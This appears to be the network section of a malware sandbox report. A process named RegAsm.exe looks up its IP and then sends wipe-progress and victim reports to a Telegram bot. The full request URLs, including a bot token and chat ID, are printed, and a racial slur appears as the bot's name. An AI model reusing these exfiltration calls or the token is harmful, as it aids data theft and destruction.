                                                                      Jul 21, 2024 11:17:22.271670103 CEST8049748104.16.185.241192.168.2.4
                                                                      Jul 21, 2024 11:17:22.737010002 CEST8049748104.16.185.241192.168.2.4
                                                                      Jul 21, 2024 11:17:22.738893986 CEST49749443192.168.2.4149.154.167.220
                                                                      Jul 21, 2024 11:17:22.738945961 CEST44349749149.154.167.220192.168.2.4
                                                                      Jul 21, 2024 11:17:22.739115000 CEST49749443192.168.2.4149.154.167.220
                                                                      Jul 21, 2024 11:17:22.739818096 CEST49749443192.168.2.4149.154.167.220
                                                                      Jul 21, 2024 11:17:22.739835024 CEST44349749149.154.167.220192.168.2.4
                                                                      Jul 21, 2024 11:17:22.862904072 CEST4974880192.168.2.4104.16.185.241
                                                                      Jul 21, 2024 11:17:23.492577076 CEST44349749149.154.167.220192.168.2.4
                                                                      Jul 21, 2024 11:17:23.494240999 CEST49749443192.168.2.4149.154.167.220
                                                                      Jul 21, 2024 11:17:23.494292974 CEST44349749149.154.167.220192.168.2.4
                                                                      Jul 21, 2024 11:17:23.873666048 CEST44349749149.154.167.220192.168.2.4
                                                                      Jul 21, 2024 11:17:23.873758078 CEST44349749149.154.167.220192.168.2.4
                                                                      Jul 21, 2024 11:17:23.873914957 CEST49749443192.168.2.4149.154.167.220
                                                                      Jul 21, 2024 11:17:23.874906063 CEST49749443192.168.2.4149.154.167.220
                                                                      Jul 21, 2024 11:17:23.892247915 CEST4974880192.168.2.4104.16.185.241
                                                                      Jul 21, 2024 11:17:23.892309904 CEST4974680192.168.2.4104.16.185.241

                                                                      UDP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Jul 21, 2024 11:14:07.499615908 CEST5428453192.168.2.41.1.1.1
                                                                      Jul 21, 2024 11:14:07.509393930 CEST53542841.1.1.1192.168.2.4
                                                                      Jul 21, 2024 11:14:51.242415905 CEST5918553192.168.2.41.1.1.1
                                                                      Jul 21, 2024 11:14:51.250047922 CEST53591851.1.1.1192.168.2.4
                                                                      Jul 21, 2024 11:15:33.508882046 CEST5233053192.168.2.41.1.1.1
                                                                      Jul 21, 2024 11:15:33.946429968 CEST53523301.1.1.1192.168.2.4
                                                                      Jul 21, 2024 11:17:22.250345945 CEST5043753192.168.2.41.1.1.1
                                                                      Jul 21, 2024 11:17:22.257852077 CEST53504371.1.1.1192.168.2.4

                                                                      DNS Queries

                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                      Jul 21, 2024 11:14:07.499615908 CEST192.168.2.41.1.1.10x949cStandard query (0)XLuvBdVPcngNKMPfoEAAuT.XLuvBdVPcngNKMPfoEAAuTA (IP address)IN (0x0001)false
                                                                      Jul 21, 2024 11:14:51.242415905 CEST192.168.2.41.1.1.10x38f8Standard query (0)icanhazip.comA (IP address)IN (0x0001)false
                                                                      Jul 21, 2024 11:15:33.508882046 CEST192.168.2.41.1.1.10x8a9bStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                      Jul 21, 2024 11:17:22.250345945 CEST192.168.2.41.1.1.10x68afStandard query (0)icanhazip.comA (IP address)IN (0x0001)false

                                                                      DNS Answers

                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                      Jul 21, 2024 11:14:07.509393930 CEST1.1.1.1192.168.2.40x949cName error (3)XLuvBdVPcngNKMPfoEAAuT.XLuvBdVPcngNKMPfoEAAuTnonenoneA (IP address)IN (0x0001)false
                                                                      Jul 21, 2024 11:14:51.250047922 CEST1.1.1.1192.168.2.40x38f8No error (0)icanhazip.com104.16.185.241A (IP address)IN (0x0001)false
                                                                      Jul 21, 2024 11:14:51.250047922 CEST1.1.1.1192.168.2.40x38f8No error (0)icanhazip.com104.16.184.241A (IP address)IN (0x0001)false
                                                                      Jul 21, 2024 11:15:33.946429968 CEST1.1.1.1192.168.2.40x8a9bNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                      Jul 21, 2024 11:17:22.257852077 CEST1.1.1.1192.168.2.40x68afNo error (0)icanhazip.com104.16.185.241A (IP address)IN (0x0001)false
                                                                      Jul 21, 2024 11:17:22.257852077 CEST1.1.1.1192.168.2.40x68afNo error (0)icanhazip.com104.16.184.241A (IP address)IN (0x0001)false

                                                                      HTTP Request Dependency Graph

                                                                      • api.telegram.org
                                                                      • icanhazip.com

                                                                      HTTP Packets

                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      0192.168.2.449737104.16.185.241807904C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jul 21, 2024 11:14:51.260724068 CEST63OUTGET / HTTP/1.1
                                                                      Host: icanhazip.com
                                                                      Connection: Keep-Alive
                                                                      Jul 21, 2024 11:14:51.719336987 CEST534INHTTP/1.1 200 OK
                                                                      Date: Sun, 21 Jul 2024 09:14:51 GMT
                                                                      Content-Type: text/plain
                                                                      Content-Length: 12
                                                                      Connection: keep-alive
                                                                      Access-Control-Allow-Origin: *
                                                                      Access-Control-Allow-Methods: GET
                                                                      Set-Cookie: __cf_bm=mx3YxB5m2CbBH4e_Gr2mk.zS3jO_kb8_5iwsvqaaywM-1721553291-1.0.1.1-yr6tFtJdhRZ_gyUr_vYtm5LPtlXTYIibGW1ftF4u31giE9ciKeU__uNEaQTubUSGe5v1o7DopMQQtrN_PIzQ_A; path=/; expires=Sun, 21-Jul-24 09:44:51 GMT; domain=.icanhazip.com; HttpOnly
                                                                      Server: cloudflare
                                                                      CF-RAY: 8a6a1548ee5d6a56-EWR
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 0a
                                                                      Data Ascii: 8.46.123.33


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      1192.168.2.449740104.16.185.241807904C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jul 21, 2024 11:15:56.427700996 CEST39OUTGET / HTTP/1.1
                                                                      Host: icanhazip.com
                                                                      Jul 21, 2024 11:15:56.898094893 CEST534INHTTP/1.1 200 OK
                                                                      Date: Sun, 21 Jul 2024 09:15:56 GMT
                                                                      Content-Type: text/plain
                                                                      Content-Length: 12
                                                                      Connection: keep-alive
                                                                      Access-Control-Allow-Origin: *
                                                                      Access-Control-Allow-Methods: GET
                                                                      Set-Cookie: __cf_bm=1AME0mCoJsK7xoKREJ26ehcq8thkv3AesZXsLDZgpTw-1721553356-1.0.1.1-G8xIvwK9HhtZ6p8crnU7sNzG18MaNQHB7qLyl.p1I9LJgdrOgwdXzYBxdIp3SfmnZDx7jjYGtowAcn_XpaOfHQ; path=/; expires=Sun, 21-Jul-24 09:45:56 GMT; domain=.icanhazip.com; HttpOnly
                                                                      Server: cloudflare
                                                                      CF-RAY: 8a6a16e049e40f3a-EWR
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 0a
                                                                      Data Ascii: 8.46.123.33


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      2192.168.2.449742104.16.185.241807904C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jul 21, 2024 11:16:17.210377932 CEST63OUTGET / HTTP/1.1
                                                                      Host: icanhazip.com
                                                                      Connection: Keep-Alive
                                                                      Jul 21, 2024 11:16:17.679821014 CEST534INHTTP/1.1 200 OK
                                                                      Date: Sun, 21 Jul 2024 09:16:17 GMT
                                                                      Content-Type: text/plain
                                                                      Content-Length: 12
                                                                      Connection: keep-alive
                                                                      Access-Control-Allow-Origin: *
                                                                      Access-Control-Allow-Methods: GET
                                                                      Set-Cookie: __cf_bm=82iuoK85y0SNRmNXBBXJNz6KeqPjthJTV_Se29FDoCA-1721553377-1.0.1.1-QMWQvJiVK.Z7y3YE_IuH_W5Lj8i7S_k6Q5CdLep270EhYcj8i_eHD_CV0xbhT46Q09UZNs9hmq7SaXav.HLnvA; path=/; expires=Sun, 21-Jul-24 09:46:17 GMT; domain=.icanhazip.com; HttpOnly
                                                                      Server: cloudflare
                                                                      CF-RAY: 8a6a176219f142c3-EWR
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 0a
                                                                      Data Ascii: 8.46.123.33


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      3192.168.2.449744104.16.185.241807904C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jul 21, 2024 11:16:38.672765017 CEST63OUTGET / HTTP/1.1
                                                                      Host: icanhazip.com
                                                                      Connection: Keep-Alive
                                                                      Jul 21, 2024 11:16:39.141788006 CEST534INHTTP/1.1 200 OK
                                                                      Date: Sun, 21 Jul 2024 09:16:39 GMT
                                                                      Content-Type: text/plain
                                                                      Content-Length: 12
                                                                      Connection: keep-alive
                                                                      Access-Control-Allow-Origin: *
                                                                      Access-Control-Allow-Methods: GET
                                                                      Set-Cookie: __cf_bm=E6F3Oqx6oq1PYqb_HIW80EYk_YNmnII_kvi9bRIkexM-1721553399-1.0.1.1-OeArowfGup2qbWoQMCVujjcjpCz0XjK3b_v32m_u5l6aMNkmlNthj3K2APgVzTq8W53fYAz9ZhxNDkWtZzm3ZQ; path=/; expires=Sun, 21-Jul-24 09:46:39 GMT; domain=.icanhazip.com; HttpOnly
                                                                      Server: cloudflare
                                                                      CF-RAY: 8a6a17e84d4f7ca5-EWR
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 0a
                                                                      Data Ascii: 8.46.123.33


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      4192.168.2.449746104.16.185.241807904C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jul 21, 2024 11:16:58.211983919 CEST39OUTGET / HTTP/1.1
                                                                      Host: icanhazip.com
                                                                      Jul 21, 2024 11:16:58.519098043 CEST39OUTGET / HTTP/1.1
                                                                      Host: icanhazip.com
                                                                      Jul 21, 2024 11:16:59.128463984 CEST39OUTGET / HTTP/1.1
                                                                      Host: icanhazip.com
                                                                      Jul 21, 2024 11:17:00.047106028 CEST534INHTTP/1.1 200 OK
                                                                      Date: Sun, 21 Jul 2024 09:16:59 GMT
                                                                      Content-Type: text/plain
                                                                      Content-Length: 12
                                                                      Connection: keep-alive
                                                                      Access-Control-Allow-Origin: *
                                                                      Access-Control-Allow-Methods: GET
                                                                      Set-Cookie: __cf_bm=Odn5DOTqwxlDt.RCCpzp58sG7yJKazCHHy9y1oDbjgI-1721553419-1.0.1.1-UNcnF6JxqFL8jjOXZ7RRkXU_OU2U8FCc8MJi9NZ2fMnkVysFveJQ.B.DLzvrCJWj0EbTawNvVv_r0FKSO2PwXQ; path=/; expires=Sun, 21-Jul-24 09:46:59 GMT; domain=.icanhazip.com; HttpOnly
                                                                      Server: cloudflare
                                                                      CF-RAY: 8a6a186af8e1421f-EWR
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 0a
                                                                      Data Ascii: 8.46.123.33


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      5192.168.2.449748104.16.185.241807904C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jul 21, 2024 11:17:22.266679049 CEST63OUTGET / HTTP/1.1
                                                                      Host: icanhazip.com
                                                                      Connection: Keep-Alive
                                                                      Jul 21, 2024 11:17:22.737010002 CEST534INHTTP/1.1 200 OK
                                                                      Date: Sun, 21 Jul 2024 09:17:22 GMT
                                                                      Content-Type: text/plain
                                                                      Content-Length: 12
                                                                      Connection: keep-alive
                                                                      Access-Control-Allow-Origin: *
                                                                      Access-Control-Allow-Methods: GET
                                                                      Set-Cookie: __cf_bm=9qoPoK1X8qS12aWV2HXqHk4JFma6Cd3Oi1RZOCGehGw-1721553442-1.0.1.1-t.ZTSKZt7GYUMZzgcC4aygDRyCn5T3U9B5B2WWGIsTFbAOcY231vP3OjHg2yN2nsyTPAAjYXqyd7gSsU8p2ZKQ; path=/; expires=Sun, 21-Jul-24 09:47:22 GMT; domain=.icanhazip.com; HttpOnly
                                                                      Server: cloudflare
                                                                      CF-RAY: 8a6a18f8ccb0443e-EWR
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 0a
                                                                      Data Ascii: 8.46.123.33


                                                                      HTTPS Proxied Packets

                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      0192.168.2.449739149.154.167.2204437904C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-07-21 09:15:34 UTC787OUTGET /bot7277950797:AAF99Nw5rAT1BHnMmwY_tQNYJFU3dYJ5RHc/sendMessage?chat_id=7436061126&text=Start%20Wipe%20%0D%0AIP%20:8.46.123.33%0D%0AMachine%20Name%20:701188%0D%0ADomain%20:user-PC%0D%0AUser%20:user%0D%0AWindows%20Drive%20:C:%5C%0D%0A--------------------%0D%0ADisk%20by%20GB%0D%0AC:%5C%7CFixed%20=%3E%20Size:223%20Used:55%20Free:168%0D%0A-----%0D%0AAllDrive%20=%3E%20Size:223%20Used:55%20Free:168%0D%0A--------------------%0D%0AAmount%20of%20Files%0D%0AWindows%20Drive%20:Other%20Folders%20:115%E2%80%99597%0D%0AUsers%20Folders%20:107%E2%80%99845%0D%0AApp%20Folder%20:40%E2%80%99821%0D%0AWindows%20Folder:98%E2%80%99718%0D%0A-----%0D%0AOther%20Drives%20:0%0D%0A--------------------%0D%0ATime%20:2024/07/21%2005:14:51%0D%0A HTTP/1.1
                                                                      Host: api.telegram.org
                                                                      Connection: Keep-Alive
                                                                      2024-07-21 09:15:35 UTC388INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0
                                                                      Date: Sun, 21 Jul 2024 09:15:34 GMT
                                                                      Content-Type: application/json
                                                                      Content-Length: 724
                                                                      Connection: close
                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                      Access-Control-Allow-Origin: *
                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                      2024-07-21 09:15:35 UTC724INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 31 34 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 37 37 39 35 30 37 39 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6e 69 67 67 65 72 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 43 73 73 37 38 38 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 34 33 36 30 36 31 31 32 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 2e 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 32 31 35 35 33 33 33 34 2c 22 74 65 78 74 22 3a 22 53 74 61 72 74 20 57 69 70 65 20 5c 6e 49 50 20 3a 38 2e 34 36 2e 31 32 33 2e 33 33 5c 6e 4d 61 63 68 69 6e 65 20 4e 61 6d 65 20 3a 37 30 31
                                                                      Data Ascii: {"ok":true,"result":{"message_id":1148,"from":{"id":7277950797,"is_bot":true,"first_name":"nigger","username":"Css788bot"},"chat":{"id":7436061126,"first_name":".","type":"private"},"date":1721553334,"text":"Start Wipe \nIP :8.46.123.33\nMachine Name :701


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      1192.168.2.449741149.154.167.2204437904C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-07-21 09:15:57 UTC310OUTGET /bot7277950797:AAF99Nw5rAT1BHnMmwY_tQNYJFU3dYJ5RHc/sendMessage?chat_id=7436061126&text=Operation%20Report%20-%20Other%20Drives%20%0D%0AIP%20:8.46.123.33%0D%0AMachine%20Name%20:701188%0D%0AUndeleted%20Files%20:0%0D%0ATime%20:2024/07/21%2005:15:56 HTTP/1.1
                                                                      Host: api.telegram.org
                                                                      Connection: Keep-Alive
                                                                      2024-07-21 09:15:57 UTC388INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0
                                                                      Date: Sun, 21 Jul 2024 09:15:57 GMT
                                                                      Content-Type: application/json
                                                                      Content-Length: 381
                                                                      Connection: close
                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                      Access-Control-Allow-Origin: *
                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                      2024-07-21 09:15:57 UTC381INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 31 35 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 37 37 39 35 30 37 39 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6e 69 67 67 65 72 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 43 73 73 37 38 38 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 34 33 36 30 36 31 31 32 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 2e 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 32 31 35 35 33 33 35 37 2c 22 74 65 78 74 22 3a 22 4f 70 65 72 61 74 69 6f 6e 20 52 65 70 6f 72 74 20 2d 20 4f 74 68 65 72 20 44 72 69 76 65 73 20 5c 6e 49 50 20 3a 38 2e 34 36 2e 31 32 33 2e
                                                                      Data Ascii: {"ok":true,"result":{"message_id":1150,"from":{"id":7277950797,"is_bot":true,"first_name":"nigger","username":"Css788bot"},"chat":{"id":7436061126,"first_name":".","type":"private"},"date":1721553357,"text":"Operation Report - Other Drives \nIP :8.46.123.


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      2192.168.2.449743149.154.167.2204437904C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-07-21 09:16:18 UTC331OUTGET /bot7277950797:AAF99Nw5rAT1BHnMmwY_tQNYJFU3dYJ5RHc/sendMessage?chat_id=7436061126&text=Operation%20Report%20-%20Windows%20Drive%20%0D%0AIP%20:8.46.123.33%0D%0AMachine%20Name%20:701188%0D%0AUndeleted%20Files%20:115%E2%80%99597%0D%0ATime%20:2024/07/21%2005:16:17%0D%0A HTTP/1.1
                                                                      Host: api.telegram.org
                                                                      Connection: Keep-Alive
                                                                      2024-07-21 09:16:19 UTC388INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0
                                                                      Date: Sun, 21 Jul 2024 09:16:19 GMT
                                                                      Content-Type: application/json
                                                                      Content-Length: 393
                                                                      Connection: close
                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                      Access-Control-Allow-Origin: *
                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                      2024-07-21 09:16:19 UTC393INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 31 35 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 37 37 39 35 30 37 39 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6e 69 67 67 65 72 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 43 73 73 37 38 38 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 34 33 36 30 36 31 31 32 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 2e 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 32 31 35 35 33 33 37 39 2c 22 74 65 78 74 22 3a 22 4f 70 65 72 61 74 69 6f 6e 20 52 65 70 6f 72 74 20 2d 20 57 69 6e 64 6f 77 73 20 44 72 69 76 65 20 5c 6e 49 50 20 3a 38 2e 34 36 2e 31 32 33
                                                                      Data Ascii: {"ok":true,"result":{"message_id":1151,"from":{"id":7277950797,"is_bot":true,"first_name":"nigger","username":"Css788bot"},"chat":{"id":7436061126,"first_name":".","type":"private"},"date":1721553379,"text":"Operation Report - Windows Drive \nIP :8.46.123


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      3192.168.2.449745149.154.167.2204437904C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-07-21 09:16:39 UTC330OUTGET /bot7277950797:AAF99Nw5rAT1BHnMmwY_tQNYJFU3dYJ5RHc/sendMessage?chat_id=7436061126&text=Operation%20Report%20-%20Users%20Fodler%20%0D%0AIP%20:8.46.123.33%0D%0AMachine%20Name%20:701188%0D%0Aundeleted%20Files%20:107%E2%80%99845%0D%0ATime%20:2024/07/21%2005:16:39%0D%0A HTTP/1.1
                                                                      Host: api.telegram.org
                                                                      Connection: Keep-Alive
                                                                      2024-07-21 09:16:40 UTC388INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0
                                                                      Date: Sun, 21 Jul 2024 09:16:40 GMT
                                                                      Content-Type: application/json
                                                                      Content-Length: 392
                                                                      Connection: close
                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                      Access-Control-Allow-Origin: *
                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                      2024-07-21 09:16:40 UTC392INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 31 35 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 37 37 39 35 30 37 39 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6e 69 67 67 65 72 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 43 73 73 37 38 38 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 34 33 36 30 36 31 31 32 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 2e 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 32 31 35 35 33 34 30 30 2c 22 74 65 78 74 22 3a 22 4f 70 65 72 61 74 69 6f 6e 20 52 65 70 6f 72 74 20 2d 20 55 73 65 72 73 20 46 6f 64 6c 65 72 20 5c 6e 49 50 20 3a 38 2e 34 36 2e 31 32 33 2e
                                                                      Data Ascii: {"ok":true,"result":{"message_id":1152,"from":{"id":7277950797,"is_bot":true,"first_name":"nigger","username":"Css788bot"},"chat":{"id":7436061126,"first_name":".","type":"private"},"date":1721553400,"text":"Operation Report - Users Fodler \nIP :8.46.123.


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      4192.168.2.449747149.154.167.2204437904C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-07-21 09:17:00 UTC347OUTGET /bot7277950797:AAF99Nw5rAT1BHnMmwY_tQNYJFU3dYJ5RHc/sendMessage?chat_id=7436061126&text=Operation%20Report%20-%20App%20Folder%20%0D%0AIP%20:8.46.123.33%0D%0AMachine%20Name%20:701188%0D%0AUndeleted%20Files%20:40%E2%80%99821%0D%0A%D8%B2%D9%85%D8%A7%D9%86%20:2024/07/21%2005:16:59%0D%0A HTTP/1.1
                                                                      Host: api.telegram.org
                                                                      Connection: Keep-Alive
                                                                      2024-07-21 09:17:01 UTC388INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0
                                                                      Date: Sun, 21 Jul 2024 09:17:01 GMT
                                                                      Content-Type: application/json
                                                                      Content-Length: 409
                                                                      Connection: close
                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                      Access-Control-Allow-Origin: *
                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                      2024-07-21 09:17:01 UTC409INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 31 35 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 37 37 39 35 30 37 39 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6e 69 67 67 65 72 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 43 73 73 37 38 38 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 34 33 36 30 36 31 31 32 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 2e 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 32 31 35 35 33 34 32 31 2c 22 74 65 78 74 22 3a 22 4f 70 65 72 61 74 69 6f 6e 20 52 65 70 6f 72 74 20 2d 20 41 70 70 20 46 6f 6c 64 65 72 20 5c 6e 49 50 20 3a 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                      Data Ascii: {"ok":true,"result":{"message_id":1153,"from":{"id":7277950797,"is_bot":true,"first_name":"nigger","username":"Css788bot"},"chat":{"id":7436061126,"first_name":".","type":"private"},"date":1721553421,"text":"Operation Report - App Folder \nIP :8.46.123.33


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      5192.168.2.449749149.154.167.2204437904C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-07-21 09:17:23 UTC331OUTGET /bot7277950797:AAF99Nw5rAT1BHnMmwY_tQNYJFU3dYJ5RHc/sendMessage?chat_id=7436061126&text=Operation%20Report%20-%20Windows%20Folder%20%0D%0AIP%20:8.46.123.33%0D%0AMachine%20Name%20:701188%0D%0AUndeleted%20Files%20:98%E2%80%99718%0D%0ATime%20:2024/07/21%2005:17:22%0D%0A HTTP/1.1
                                                                      Host: api.telegram.org
                                                                      Connection: Keep-Alive
                                                                      2024-07-21 09:17:23 UTC388INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0
                                                                      Date: Sun, 21 Jul 2024 09:17:23 GMT
                                                                      Content-Type: application/json
                                                                      Content-Length: 393
                                                                      Connection: close
                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                      Access-Control-Allow-Origin: *
                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                      2024-07-21 09:17:23 UTC393INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 31 35 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 37 37 39 35 30 37 39 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6e 69 67 67 65 72 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 43 73 73 37 38 38 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 34 33 36 30 36 31 31 32 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 2e 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 32 31 35 35 33 34 34 33 2c 22 74 65 78 74 22 3a 22 4f 70 65 72 61 74 69 6f 6e 20 52 65 70 6f 72 74 20 2d 20 57 69 6e 64 6f 77 73 20 46 6f 6c 64 65 72 20 5c 6e 49 50 20 3a 38 2e 34 36 2e 31 32
                                                                      Data Ascii: {"ok":true,"result":{"message_id":1154,"from":{"id":7277950797,"is_bot":true,"first_name":"nigger","username":"Css788bot"},"chat":{"id":7436061126,"first_name":".","type":"private"},"date":1721553443,"text":"Operation Report - Windows Folder \nIP :8.46.12


                                                                      Statistics

                                                                      CPU Usage

                                                                      Click to jump to process

                                                                      Memory Usage

                                                                      Click to jump to process

                                                                      High Level Behavior Distribution

                                                                      Click to dive into process behavior distribution

                                                                      Behavior

                                                                      Click to jump to process

                                                                      System Behavior

                                                                      General

                                                                      Target ID:0
                                                                      Start time:05:14:00
